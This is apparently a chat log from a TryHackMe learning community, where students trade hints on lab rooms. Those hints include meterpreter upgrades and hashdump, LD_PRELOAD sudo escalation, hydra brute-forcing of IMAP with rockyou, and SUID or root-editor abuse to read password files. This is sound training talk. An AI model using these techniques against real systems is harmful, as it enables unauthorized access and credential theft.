Ctrl Z the process. then you get back to your meterpreter shell and then

search shell_to_meterpreter
use the module
show options
set all the required options, also set the session 1. As u just made the win shell background
run

you'll now get a meterpreter shell

now :

execute hashdump to get the hashes

copy pirate's hash

go to your local machine and crack the hash . keep the --format=NT

Ping me if you still get any issue!

modest arch
#

I can't get the flag from these 5 : )

next lanceBOT
#

Gave +1 Rep to @north dove

north dove
north dove
# north dove wait lemme see !

can u give me 10 minutes? lol ! i was goin to make a subscription.
After i saw your message i thought to do yours first ! but unfortunately burp intruder room requires subscription darkchamp

modest arch
#

yeah I positioned it next to the GET request i mean the URL/tickets/$number$

north dove
#

wait lemme see if i can help anyway

modest arch
#

how do I know it it's MY cookie

modest arch
north dove
#

what's the question?

loud spire
#

gcc -fPIC -shared -o shell.so shell.c -nostartfiles
i am not allowed to run sudo
and gcc is not installed, nor can i install it

#

ok ok.

north dove
#

yeah!

loud spire
#

got it

modest arch
north dove
#

oh ! lemme see

#

How about changing the length

#

try

modest arch
#

u mean number 1-100?

north dove
pearl compass
#

can anyone help with file inclusion task 4? im stuck on the first question

modest arch
#

yeah

north dove
#

lol! coz that's what heroes dokekw

pearl compass
north dove
novel rover
#

what should i write in answer if no os is detected in Nmap Post Port Scans?

north dove
#

LFI is fun

#

RFI is cool

modest arch
#

I did that too

#

404

oblique sand
#

Hey guys i am on Metasploitexploitation room.

I am currently on task 5

What is the NTLM hash of the password of the user "pirate"?

I have the hashdump of the password but not sure how to get the NTLM hash.
Done some digging but nothing so far

Someone point me in the right direction ๐Ÿ˜„

modest arch
#

404 error blah blah

modest arch
oblique sand
#

@steel nymph i done some digging but alot of info online is forwarding me onto tcp reverse exploit. But not sure that is correct

idle bison
oblique sand
#

@idle bison cheers

idle bison
#

More specifically, it's the pwdump format there.

#

That bit of documentation is annoyingly difficult to find sometimes

modest arch
#

so how do I bring the cookie here

#

task11

idle bison
#

You can also add it, it's the Cookie: stuffHere header

#

Find an authenticated request and copy the header

oblique sand
#

@idle bison Thanks i worked it out

next lanceBOT
#

Gave +1 Rep to @idle bison

idle bison
loud spire
#

i am confused, LD_PRELOAD isn't there anywhere whne i type sudo -l, instead there is amail_badpass

#

should i set sudo mail_badpass=/home/user/ldpreload/shell.so find

#

instead of sudo LD_PRELOAD=/home/user/ldpreload/shell.so find

idle bison
#

Nope

#

LD_PRELOAD is specifically libraries, it needs to be that variable

loud spire
#

sudo -l
Matching Defaults entries for karen on ip-10-10-23-155:
env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User karen may run the following commands on ip-10-10-23-155:
(ALL) NOPASSWD: /usr/bin/find
(ALL) NOPASSWD: /usr/bin/less
(ALL) NOPASSWD: /usr/bin/nano

#

this is the output of sudo -l

#

i am in /tmp

deep scaffold
loud spire
#

ok

proven glen
#

What can i use that will get me flag in File Inclusion challenge 3 I can't find the filter bypass ๐Ÿ˜ข

steep bay
#

Can anyone give me a hint for File Inclusion, Task 8, Challenge 3?
The one that filters the input.

ocean socket
tall siren
loud spire
idle bison
tall siren
#

yes, I have the same issue and I was stuck

#

env_keep is not available right?

idle bison
#

On some systems, you may see the LD_PRELOAD environment option. Looks like it's telling you about it but doesn't expect you to do it?

deep scaffold
proven glen
deep scaffold
idle bison
#

@loud spire @tall siren I agree it's confusing, it'd be good for them to add a vulnerable config so you can practice as they do in the video.

loud spire
#

so should i skip that task for now ?

idle bison
modest arch
#

Found the flag thanks to @steel nymph @modest arch @idle bison @north dove

next lanceBOT
#

Gave +1 Rep to @steel nymph

modest arch
#

so sad only lassi got repo

knotty walrus
#

I think i am making a mistake in XSS lab last task

#

can somebody help me with the gig?

#

yeah that is the issue ๐Ÿ˜…

earnest shell
#

Hey if someone wants to hack with me on the junior pentester path let me know

#

I'm on authentication bypass

earnest shell
#

I'm in the room

grim summit
#

Is anyone else having a hard time with Exploit Vulnerabilities task 5? I was able to find the exploit to use against the vulnerable machine, I downloaded it from exploitdb but metasploit still refuses to see it. Is there any other way to execute it against the webserver?

visual crest
earnest shell
#

There is a general room lol@visual crest

#

Entire general room lol @visual crest

grim summit
#

Its under Vulnerability research. And it is a python script. I wasn't sure if they expected you to use ExploitDB -> Import to msf ->execute

idle bison
grim summit
#

I'll try that. Thank you

next lanceBOT
#

Gave +1 Rep to @steel nymph

grim summit
idle bison
#

It's python. It's not a ruby msf module.

#

It wouldn't have imported because it's not built to be imported

deep scaffold
grim summit
grim summit
deep scaffold
modest arch
#

Damn this task 12 of Burpsuite intruder made me realize what a dangerous tool it can be

#

Also increased my respect for it

visual crest
#

knowledge is power

pearl compass
#

Any words of advice?

visual crest
#

figure out how to change it from GET to POST

cold iris
#

Protocals and servers 2 task 6 is bane

#

||hydra -l lazie -P ~/wordlists/rockyou.txt 10.10.252.39 imap|| this is the command ive been using, my wordlist is in a different place ohhhhh wait im gonna try something

buoyant tiger
#

Any support available ? I'm not able to launch any Machine, it says Remote Server Error

#

nobody answers

cold iris
#

well thanks @steel nymph i managed but my soul hurts

next lanceBOT
#

Gave +1 Rep to @steel nymph

idle bison
oblique sand
#

I am on Task 6 in the Metasploitexplotation room.

When gaining access to the reverse shell, i believe it is supposed to prompt a meterpreter to allow me to do what i need to do for the next task. This is all i am currently seeing. Have i done anything wrong?

Everything seems correct

idle bison
oblique sand
#

yeah, i have set the payload to the one i created im pretty sure

#

let me double check

buoyant tiger
#

the x86 ?

oblique sand
#

yep

idle bison
oblique sand
buoyant tiger
#

it's the wrong payload

#

for this room it's another one

oblique sand
#

i just see that xD I did set it

#

let me try again

idle bison
#

Make sure LHOST is your VPN IP too, although you might be using the THM Kali?

oblique sand
#

Yeah using the THM kali

idle bison
#

Ok so it's probably fine as is

#

Given you got the callback before

oblique sand
#

when i try to add the .elf shell it doesn't seem to like it

#

Yeah ^

#

My payload is the .elf file but not liking it

#

Oh i think i get it,

the .elf file is for the target system ๐Ÿ˜„

visual crest
#

yes ๐Ÿ™‚

oblique sand
#

i tried to use .elf on my system and target

#

Sorted it, cheers

loud spire
#

in task 7 how do i read flag3

#

as i do not have permissions to edit the contents of etc/passwd i won't be able to add user

visual crest
#

everything to do the linux priv esc challenges is in the text itself

#

yeah

loud spire
#

i broke passwords of users

#

of all the three users, but how to read the flag as i am not root nor i can add user to the /etc/passwd file

visual crest
#

yeah so did I, looking at the instructions, I didn't follow those

visual crest
loud spire
#

the problem is i can't use nano for reading the file

visual crest
#

basically... if you can run a text editor as root, you can basically edit any text that root can

loud spire
#

nor can i write to it

visual crest
#

why not?

loud spire
#

if i was root then why would i add user, i would directly read the flag

visual crest
#

yes you could do that too, which is how I did it

#

OH that one

oblique sand
#

Sorry to be pain again.

now that i have the meterpeter access on the target machine. I am supposed to use hashdump module to get the hash for the question.

Last machine had hashdump on the machine, this one doesn't.

It sounds like a module from msfconsole but not sure. anyone got a little hint?

visual crest
# loud spire yes

so yeah its not a text editor but something is suid on this box that can allow you to read files

oblique sand
#

@steel nymph alright cheers

visual crest
#

yeah it does but not sure why

#

hmm

loud spire
#

i got the flag

visual crest
#

generally we try not to post the exact way to do something or if you do, spoiler it

loud spire
#

what do u mean ?

#

you want me to delete that message ?

visual crest
#

or spoiler it, yes so others can figure it out themselves

loud spire
#

ok

#

๐Ÿ‘ done

#

no it down't

#

doesn't

oblique sand
#

@steel nymph ahh alright. Yeah just need to figure out how to do it. Gonna do some research ๐Ÿ˜„

idle bison
#

I guess it's also a noun for a collection of dumped hashes

oblique sand
#

It is where it says use post exploit module. That threw me off

earnest shell
#

Hey there, you guys know how to do the encode/decode on authentication bypass

idle bison
#

I take issue with "other hashes" there, base64 is not a hash

#

Aside from that, I very much agree with crackstation for cracking unsalted hashes

oblique sand
#

@steel nymph I figured it out. Performing the post exploit, i am getting an error. Is this something i have done wrong?

#

Ahh alright

idle bison
oblique sand
#

just a reverse shell. But i did see a shell option. But my box just expired rip. Gotta do it again haha

#

i did but i also was able to shell using a shell command

#

oh ^

#

i see what u mean, haha im silly. It was a Meterpreter shell xD

upper edge
#

hello not sure what I am doing wrong for this one (Password Attack) but it's taking forever, this normal for this task?

#

hydra -l lazie -P /usr/share/wordlists/rockyou.txt 10.10.180.94 imap

#

Protocols and Servers 2

#

I am

#

thanks will try that

#

That did it, appreciate it @steel nymph

rough ore
#

help We will then add this password with a username to the /etc/passwd file.

#

linux provesc task 7

lusty bolt
#

sometimes it works sometimes it doesn't

#

really annoying

drifting drum
#

Ms17010 is a really finikey exploit

#

Windows dosent like it at all

#

If it fails you need to restart the machine

deft valley
deft valley
lusty bolt
#

YES it worked
finally

drifting drum
#

You'll find exactly what you need

#

Which task?

deep scaffold
deft valley
#

but he can answer 2nd q

drifting drum
#

No. That task is slightly misleading. It's not telling you what you need to do. It's giving you examples of what can be done with an an SUID file

lusty bolt
#

I'm trying to use shell_to_meterpreter but it just shows this and doesn't actually do anything

drifting drum
#

Yea very

rough ore
#

What is the password of user2 cat: /etc/shadow: Permission denied